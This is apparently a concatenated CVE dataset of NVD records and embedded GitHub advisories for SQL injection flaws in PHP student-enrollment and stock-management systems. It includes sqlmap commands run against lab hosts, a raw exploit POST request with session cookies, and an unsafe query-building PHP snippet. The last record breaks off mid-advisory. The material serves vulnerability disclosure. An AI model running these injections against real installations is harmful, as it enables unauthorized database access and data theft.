"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Lanxiy7th/lx_CVE_report-/issues/8 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Lanxiy7th",
"lx_CVE_report-"
] | # Itsourcecode Online Student Enrollment System Project In PHP listofinstructor.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Online Student Enrollment System Project In PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-student-enrollment-system/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Lanxiy7th
## Vulnerable File
+ listofinstructor.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2016/01/kccreg.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'listofinstructor.php' file of the 'online-student-enrollment-system' project. The reason for this issue is that attackers inject malicious code from the parameter "FullName" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="680" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/dd570534-0f71-4d7e-a08b-1fab5a45a73c">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the 'Online Student Enrollment System Project In PHP', Lanxiy7th discovered a critical SQL injection vulnerability in the "listofinstructor.php" file. This vulnerability stems from insufficient user input validation of the "FullName" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
## Vulnerability type:
+ boolean-based blind
+ time-based blind
## Vulnerability location:
+ 'FullName' parameter
## Payload:
<img width="320" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/15f5cb9d-a7a0-46dc-8e28-054c3be4a0a4">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u "http://192.168.144.199:1217/kccreg/listofinstructor.php?instuctorId=&FullName=123321" --batch --dbs
```
<img width="319" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/1f8b5dd0-a927-4a34-9e3c-18e22046ad27">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Online Student Enrollment System Project In PHP listofinstructor.php SQL injection | https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/8/comments | 0 | 2024-05-26T04:42:31Z | 2024-05-26T04:42:32Z | https://github.com/Lanxiy7th/lx_CVE_report-/issues/8 | 2,317,479,011 | 8 | 6,039 |
CVE-2024-5396 | 2024-05-27T03:15:08.650 | A vulnerability classified as critical has been found in itsourcecode Online Student Enrollment System 1.0. Affected is an unknown function of the file newfaculty.php. The manipulation of the argument name leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-266310 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/9"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266310"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266310"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344699"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266310"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266310"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344699"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Lanxiy7th/lx_CVE_report-/issues/9 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Lanxiy7th",
"lx_CVE_report-"
] | # Itsourcecode Online Student Enrollment System Project In PHP newfaculty.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Online Student Enrollment System Project In PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-student-enrollment-system/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Lanxiy7th
## Vulnerable File
+ newfaculty.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2016/01/kccreg.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'newfaculty.php' file of the 'online-student-enrollment-system' project. The reason for this issue is that attackers inject malicious code from the parameter "name" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="633" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/942c9905-aae1-402c-8b7d-785b2707c818">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the 'Online Student Enrollment System Project In PHP', Lanxiy7th discovered a critical SQL injection vulnerability in the "newfaculty.php" file. This vulnerability stems from insufficient user input validation of the "name" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
POST /kccreg/newfaculty.php HTTP/1.1
Host: 192.168.144.199:1217
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
Origin: http://192.168.144.199:1217
Connection: close
Referer: http://192.168.144.199:1217/kccreg/newfaculty.php
Cookie: pma_lang=zh_CN; phpMyAdmin=len9ob4npbvfdq6covmbegt63r; pmaUser-1=%7B%22iv%22%3A%22T%5C%2FCNohNoUS6vPeq7Nu7Zlw%3D%3D%22%2C%22mac%22%3A%22612b6061a48fea2497ec15d24ac758094d001624%22%2C%22payload%22%3A%22oBKb1qokv1s8RyKQorlz4w%3D%3D%22%7D; PHPSESSID=hnl0ppij1sd9vouvkhsg32c1j5; pmaAuth-1=%7B%22iv%22%3A%229HoKmgAu8K5%5C%2FvRe%5C%2FctcrUw%3D%3D%22%2C%22mac%22%3A%22d1b4c1f728f0b917499c499c26c1efc9e4cc99c7%22%2C%22payload%22%3A%22A4x7p0kon2pEBGwcRUcZJJM01WQ6mIgqc1HifbZxU2o%3D%22%7D
Upgrade-Insecure-Requests: 1
Priority: u=1
deptid=&name=321&deptid=&address=321&Gender=M&civilstats=Single&deptid=&specialization=321&deptid=&empStats=123&deptid=&email=1231%40w2w.com&savefaculty=
## Vulnerability type:
+ boolean-based blind
+ time-based blind
## Vulnerability location:
+ 'name' parameter
## Payload:
<img width="310" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/a45ac0ee-1b34-437a-bd54-78e7a4ffd874">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -r abc --batch --dbs
```
<img width="308" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/65baa2ee-ad71-4306-8044-05faa411ef04">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Online Student Enrollment System Project In PHP newfaculty.php SQL injection | https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/9/comments | 0 | 2024-05-26T04:49:51Z | 2024-05-26T04:49:51Z | https://github.com/Lanxiy7th/lx_CVE_report-/issues/9 | 2,317,480,857 | 9 | 6,040 |
CVE-2024-5397 | 2024-05-27T03:15:08.923 | A vulnerability classified as critical was found in itsourcecode Online Student Enrollment System 1.0. Affected by this vulnerability is an unknown functionality of the file instructorSubjects.php. The manipulation of the argument instructorId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266311. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/10"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266311"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266311"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344700"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/10"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266311"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266311"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344700"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Lanxiy7th/lx_CVE_report-/issues/10 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Lanxiy7th",
"lx_CVE_report-"
] | # Itsourcecode Online Student Enrollment System Project In PHP instructorSubjects.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Online Student Enrollment System Project In PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-student-enrollment-system/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Lanxiy7th
## Vulnerable File
+ instructorSubjects.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2016/01/kccreg.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'instructorSubjects.php' file of the 'online-student-enrollment-system' project. The reason for this issue is that attackers inject malicious code from the parameter "instructorId" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="637" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/8db98d65-c62d-4f48-b4ed-541cd2ce0ff6">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the 'Online Student Enrollment System Project In PHP', Lanxiy7th discovered a critical SQL injection vulnerability in the "instructorSubjects.php" file. This vulnerability stems from insufficient user input validation of the "instructorId" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
## Vulnerability type:
+ boolean-based blind
+ time-based blind
## Vulnerability location:
+ 'instructorId' parameter
## Payload:
<img width="306" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/2706ee55-18fe-41d4-8d17-0cd971773e74">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u "http://192.168.144.199:1217/kccreg/instructorSubjects.php?instructorId=1" --batch --dbs
```
<img width="307" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/0061af32-cfd4-46cf-8705-95c9390d0fd7">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Online Student Enrollment System Project In PHP instructorSubjects.php SQL injection | https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/10/comments | 0 | 2024-05-26T04:59:07Z | 2024-05-26T04:59:07Z | https://github.com/Lanxiy7th/lx_CVE_report-/issues/10 | 2,317,483,336 | 10 | 6,041 |
CVE-2024-5515 | 2024-05-30T13:15:50.247 | A vulnerability was found in SourceCodester Stock Management System 1.0. It has been classified as critical. Affected is an unknown function of the file createBrand.php. The manipulation of the argument brandName leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-266586 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/HaojianWang/cve/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266586"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266586"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.345714"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/HaojianWang/cve/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266586"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266586"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.345714"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:warrendaloyan:stock_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8F75A0CB-D496-4651-8633-972D8FA69746",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/HaojianWang/cve/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"HaojianWang",
"cve"
] | # SourceCodester Stock Management System in PHP 1.0 createBrand.php SQL injection vulnerability
# NAME OF AFFECTED PRODUCT(S)
+ Stock Management System in PHP
## Vendor Homepage
+ https://www.sourcecodester.com/php/14366/stock-management-system-php.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Wang Haojian
## Vulnerable File
+ createBrand.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the "createBrand. php" file of the "Inventory Management System" project. The reason for this issue is that the user inputs the 'brandName' from the '$brandName=$$POST ['brandName'] 'and uses it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
## Vulnerability code snippets
```php
<?php
require_once 'core.php';
$valid['success'] = array('success' => false, 'messages' => array());
if($_POST) {
$brandName = $_POST['brandName'];
$brandStatus = $_POST['brandStatus'];
$sql = "INSERT INTO brands (brand_name, brand_active, brand_status) VALUES ('$brandName', '$brandStatus', 1)";
if($connect->query($sql) === TRUE) {
$valid['success'] = true;
$valid['messages'] = "Successfully Added";
} else {
$valid['success'] = false;
$valid['messages'] = "Error while adding the members";
}
$connect->close();
echo json_encode($valid);
} // /if $_POST
```
+ In the above code, the username and password are directly embedded in the SQL query, making them vulnerable to SQL injection attacks
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
